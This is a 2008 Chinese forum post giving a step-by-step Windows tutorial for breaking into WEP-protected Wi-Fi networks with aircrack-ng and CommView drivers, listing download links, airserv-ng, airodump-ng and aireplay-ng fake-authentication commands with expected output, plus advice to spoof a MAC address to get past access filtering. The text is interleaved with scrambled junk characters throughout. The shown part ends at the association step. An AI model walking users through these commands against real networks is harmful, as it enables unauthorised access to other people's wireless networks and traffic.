上等兵
- 注册时间
- 2008-7-25
- 金币
- 63 个
- 威望
- 5 个
- 荣誉
- 0 个
累计签到:2 天
连续签到:0 天
[LV.20]漫游旅程
|
使用airrack和注射式攻击来破解WEPA首先你需要正确安装网卡驱动: 如果你的网卡不被commview支持的话,那么你需要安装wildpackets的驱动.
6 C3 x4 _" Q) M" I' LA1如果你的网卡被commview支持的话,那么点下面的地址下载驱动:& O" s1 j( e# k( C6 Q' q
http://www.tamos.com/bitrix/redirect.php?event1=download&event2=commwifi&event3=&goto=/files/ca5.zip
8 h+ a! T; f K' x/ M# U8 @A2 如果不被commview支持的网卡则可以下载widpackets的驱动:0 O' s4 Y h- F0 C5 h1 Q/ K8 ~" e K
http://www.wildpackets.com/support/downloads/drivers
9 R1 i+ Y0 P8 f2 a* e, H# G6 d7 e注意:下面的教程是在你正确安装commview的驱动的前提下进行的!
. a% x4 y7 w5 n6 }B 你需要下载这个.dll文件(只适用于commview 的网友):
/ O8 M- l6 J1 Fhttp://darkircop.org/commview.dll
. L* h E# t7 { r- E9 _8 s5 e2 b3 O2 {; k2 @- R/ F
C 你需要下载aircrack 压缩包: http://dl.aircrack-ng.org/aircrack-ng-svn-win.zip
7 J3 E% T4 I: l. {% n
0 P* w H2 {! B7 W7 {D 解压aircrack 压缩包到你的任意硬盘根目录,在这里我是解压到c盘
" C$ h; H3 `6 }3 f4 O' H- l5 S( I7 I% q7 ^: b5 a5 B A! E
E 把B下载到的commview.dll 放到D解压的文件夹,应该放到目录c:\aircrack\
9 p" Z+ E- \0 k5 J" J7 c+ P
# v$ c* X( r' x8 ~F 去目录c:\program files\commview for wifi\(注意这个目录是安装完commview以后才会有,也就是A1你下载的文件),然后找到”ca2k.dll”文件,把”ca2k.dll”,拷贝到(c:\aircrack).
. u9 T7 ?; Q7 T! C/ s2 o: a
- a9 V- f$ g- b6 X; R当你完成以上准备以后,就可以开始正式的破解了!
: }- p( o6 k" y9 h原文提供的连接无法下载
! [4 k6 E3 ~+ p' S$ F9 f) ?5 P" v2 W
; Q( q6 r& A2 c/ u& u- S) E! t特提供以上文件的合成包供下载7 {2 c2 l- y- ?. M
密码:password
- B* Q0 ]% X' h% ~1 x3 b5 g* Z* E! P6 }1 j% l6 _7 R
破解:
% ~. c* T5 m% `9 i1:打开一个命令提示符 (开始 > 运行 > cmd.exe)6 ^4 X- G$ G; D2 v: u) i
: G7 [# b/ d5 D/ r2 `
2:在命令提示符窗口下面输入:
+ Z: e8 f* v6 T# a( G Cd c:\aircrack ' Q! o! }- `+ A% ^3 a2 d* b
-按下回车
( Q4 H7 r" j+ t% y
4 y) l$ J- x, k; d% g2 Q3 在命令相同的提示符窗口下面输入: / `. I& ?3 b. @ k
airserv-ng -d commview.dll. O$ E' m6 C3 A6 P4 P6 j7 g% ^
-按下回车
, \& p) X2 Z! @ N' _4 P% `* c% a你看到的回复应该跟下面一样:
4 L7 B# \) N ?& K. t* v5 q- O0 I5 t# y' x
Opening card commview.dll " y( e. w. g+ C# i
Setting chan 1 $ m: h' q* b% v9 \3 r# Q) F
Opening sock port 666
' ~% n/ _5 A1 ^& X; J" _9 `Serving commview.dll chan 1 on port 666: {0 }' A+ L# K a- I
9 n5 X( o+ c/ Y: K如果你没有看到上面的结果的话,而是看到下面的结果的话:/ L6 ~) @* a/ h
' D" ^ Y4 u& j- U8 K
注意这里可能会有两种情况出现!!!!!:
1 J! ^9 X/ c, [0 K4 s: x) ], ^ k6 S( \7 i/ d
(1)+ m* f/ b" A& U O1 `2 c0 p
"Opening card commview.dll " U' h, ~, a% V0 k, g2 E
Adapter not found
" M; g& Z' J- D C+ Uget_guid()
6 W0 X8 p, c$ G" [1 }8 ?airserv-ng: wi_open(): No error"
1 ]0 E8 V& K3 o5 v# o" S( [
! b3 X4 [0 d2 }5 K9 s; v这种情况那么你可以试试这个命令:9 b$ M% d7 h; [+ ~% R& S# d6 S
% |, J. n, E1 fairserv-ng -d "commview.dll|debug"
% z z- P1 Y0 h8 G1 J4 D9 B f( ?
+ W; H# a0 p; b, a, C* O然后你可能会看到下面的结果
. m6 d3 R7 T( T g4 d2 K
' T1 ~; {& S, C/ dOpening card commview.dll|debug
: m. L* Y! b- L2 W1 ZName: [CommView] Proxim ORiNOCO 802.11b/g ComboCard Gold 8470
1 g2 ^, j+ k0 n; `* O1 Wget_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg Co ' `5 e/ C; _$ e
mboCard Gold - Paketplaner-Miniport
$ ^- Q W, R' ]. v+ u) xAdapter not found
$ p$ }7 f1 c% I0 s5 Aget_guid()
5 a' I% I& V/ hairserv-ng: wi_open(): No error
' M- m8 g0 D: _1 v% a4 t: n! J! |7 i% l* S) G( I
那么你只要输入下面的命令就可以了
@1 s5 c' C; C2 b+ [4 ?
& }8 A1 ~$ W! r E; m" K) Yairserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"
/ z- z$ t; e3 n( i, h. I
9 ]( l- G0 Z' q5 B或者会自动搜寻网卡,然后提示你是不是这个网卡,然你远yes/no,那么你需要选择yes就可以了) k. e! h. r, U3 ~3 _9 f
* y1 l# C: S, }(2)
8 ?, \* s K! H; T4 K"Opening card commview.dll 1 e8 l, P, H& g Y, s/ A
F1 # R0 e# B- i4 L9 {; Z2 n
init_lib() , e8 w g* v& r$ T, r* E+ r
airserv-ng: wi_open(): No error"8 p0 Z9 s4 X' N' }
8 k% U4 ^% G0 l* I- \
这种情况的话,那么你应该是由于安装了,windpackets 驱动而产生的问题,那么建议你安装commview 驱动,如果可能的话.9 F9 N1 f; H1 s' F2 Q% c, F: U4 ]- z' s
- ~3 N+ z1 W' Q' C. o
4+ ]" }/ `" y6 i. j l% r4 R
-注意现在重新开一个新的命令提示符窗口(我叫它窗口2),不要关掉前面的那个(窗口1)!!!/ f) F# O$ Z! n( k
-在窗口2输入命令如下:1 ]' Y" b# b" X! K( J5 a9 g, ?: I
cd c:\aircrack\
& P8 P, v0 v" P& P! w按回车* W4 q+ {# m* w9 ?3 X7 I, `7 G
. L1 V/ x. l- u
5
1 [. _" ^5 l2 B" u4 ]-在窗口2输入命令如下: . I: w! p- V5 b; ?5 b9 @
airodump-ng 127.0.0.1:666
/ f1 g O# d) s, v. _ k回车
0 E. d8 Z# y, x- Q* }% w1 D) Z
4 O# Q/ y. \ o# F/ P8 f提示: 如果你知道需要监视那个频道的话,那么你可以输入以下命令,我建议你这样做!!!:
) P2 t7 w9 m: i, A# F$ k5 i
" V4 {5 k3 |- X J0 K' {airodump-ng --channel 你的频道号 127.0.0.1:666
5 J5 A2 t+ H% g/ k! y7 a$ l6 D. E 比如说我需要监视的频道是6,那么命令如下
5 \" D/ ~" c' m: F& H, ]/ T- T4 `# F* d8 g6 @: R
airodump-ng --channel 6 127.0.0.1:6664 d# C* [. U8 G4 S% `; o) N3 a5 n
" z( n( ]2 J6 N f( l4 @+ n
好了,现在airodump-ng 现在应该已经开始截取数据了,后面我们会使用注射式攻击来提高数据包的获取速度.+ U2 m4 t+ Y. n: F. q$ ^
6 % b" M4 b2 ]9 O5 t
现在重新开一个新的命令提示符窗口(窗口3),不要关掉前面的(窗口1)和(窗口2)!!!
$ B4 q9 H, ]9 G! X, ?2 |& G# }$ ?, F0 }-在窗口3输入命令如下:
: n% f5 N, W1 {' z- v- A+ @ cd c:\aircrack\
$ X ~6 M5 {. @! M x% W* Z按回车$ r- r6 s% d* f8 H9 E! `) M' v
7
2 E* P3 H% Y; u在窗口3输入后面的命令:
( K! p! Y% H- I+ T: Uaireplay-ng -1 0 -e 你想破解网络的ESSID -a 你想破解网络的BSSID -h 你用来监视的网络的网卡MAC 127.0.0.1:666
- ` t2 a, P: U0 u3 Y实例:
& h3 }* I( p/ f/ E" G5 {& ]ESSID = wifi16 8 u) o+ E2 ]5 j- W2 e. Q& _% _
BSSID = 11:22:33:44:55:66 . _, r1 K5 s/ d+ B+ N$ b
MAC = 01:23:45:67:89:01' y r; _, X7 b4 n0 ?0 S D
提示:
3 [4 M' G6 z: C8 A3 L6 X你想破解网络的ESSID = 破解网络的名字 (wifi16, mynetwork)
3 @; F. O. o# R, d6 \5 |你想破解网络的BSSID = 破解网络的MAC (11:22:33:44:55:66)* @+ b" ]5 w4 c* R7 {! _
你用来监视的网络的网卡MAC = 这个就是你的网卡MAC咯
, y3 |+ q9 u: e8 o6 s$ r那么命令行应该是:( j% ?$ d% j' B. B( A2 G
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666* j, U) C z) {& z5 Q
如果一切正常的话那么你会得到下面的回复:
3 b; x! ]2 ^% s/ T( U4 s: Y! m) F8 bSending Authentication Request
# d# A2 @0 _" s; l) v. DAuthentication successful ' U/ ~& v$ L& ]' |
Sending Association Request ( F( ^ `+ F9 u( b6 i
Association successful
, S3 P$ {# x5 B0 I8 m. ?; @+ g如果你得到:% U- X- I# F- {" S Y4 o& x, H
AP rejects the source MAC address
) T; W4 s: ^/ E. \# {. B这说明你破解的网络只允许特定的MAC 访问,那你你需要把你的MAC地址改成破解网络允许的地址.
$ v; c2 j1 A: G" Y! `' [0 }如果你持续得到:. [# k$ f9 f# }8 {
sending authentication request
F! t. X. E8 d2 [: }" ?, o* ~那么说明你离破解网络太远了,信号太弱,你需要离破解网络跟进一点,以获得更好的信号.
: O$ v% s( ^8 c0 ]6 z! L2 K. D8 z1 m1 d
[ 本帖最后由 fzulib 于 2008-9-5 16:01 编辑 ] |
评分
-
1
查看全部评分
-
|
IP卡
狗仔卡
发表于 2008-9-1 10:13
提升卡
置顶卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
